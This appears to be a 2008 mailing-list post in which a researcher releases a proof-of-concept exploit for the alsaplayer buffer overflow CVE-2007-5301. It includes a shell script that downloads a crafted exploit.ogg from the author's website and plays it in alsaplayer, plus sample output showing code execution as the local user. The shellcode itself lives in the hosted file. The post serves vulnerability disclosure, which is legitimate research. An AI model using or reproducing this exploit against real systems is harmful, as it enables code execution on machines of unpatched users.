Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/

#!/bin/sh

http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh

Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package

alsaplayer-common at version 0.99.76-9

CVE-2007-5301 / DSA-1538

by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net

2008-04-09

Shellcode is based on metasploit framework. If you want to test it in other

systems, maybe you have to recalculate offsets.

Example:

whats@debian:~$ ./CVE-2007-5301-exploit.sh

Alsaplayer buffer overflow < 0.99.80-rc3

by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net

–12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg

=> `exploit.ogg'

Resolving www.wekk.net… 64.22.71.90

Connecting to www.wekk.net|64.22.71.90|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 5,421 (5.3K) [application/ogg]

100%[===============================================================================>] 5,421

12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]

uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
alsaplayer exploit.ogg

–
Albert Sellares GPG id: 0x13053FFE
http://www.wekk.net [email protected]
Membre de Catux.org http://catux.org
Linux User: 324456 Catalunya